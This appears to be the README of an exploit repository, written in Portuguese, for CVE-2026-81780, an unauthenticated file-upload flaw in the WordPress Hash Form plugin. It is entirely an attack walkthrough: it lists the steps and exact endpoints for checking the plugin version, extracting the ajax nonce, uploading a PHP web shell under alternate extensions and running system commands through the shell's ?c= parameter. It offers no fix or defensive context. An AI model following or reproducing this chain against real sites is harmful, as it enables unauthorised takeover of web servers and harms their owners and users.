
Exploit para CVE-2026-81780: upload de arquivo não autenticado no plugin Hash Form do WordPress, levando à execução remota de código por meio de payloads PHP elaborados.
CVE-2026-81780 — Hash Form RCE
A Vulnerabilidade
Upload de arquivo não autenticado no plugin Hash Form do WordPress (≤ 1.4.2). O plugin permite uploads arbitrários de arquivos sem autenticação adequada ou validação de tipo de arquivo, levando à Execução Remota de Código (RCE).
Cadeia de Exploração
Etapa Ação 1 O atacante verifica o plugin Hash Form via readme.txt 2 Extrai o ajax_nounce visualizando formulários (hashform_preview) 3 Envia requisição POST para hashform_file_upload_action com payload PHP 4 Envia web shell como .phar, .phtml, .php5 ou .php7 5 Aciona o shell acessando /wp-content/uploads/hashform/temp/v.{ext} 6 Executa comandos do sistema via ?c=id
GET /wp-content/plugins/hash-form/readme.txt
↓
Versão Detectada (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Extrair Nonce: ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Upload: v.phar (ou .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Comando Executado (uid=www-data)```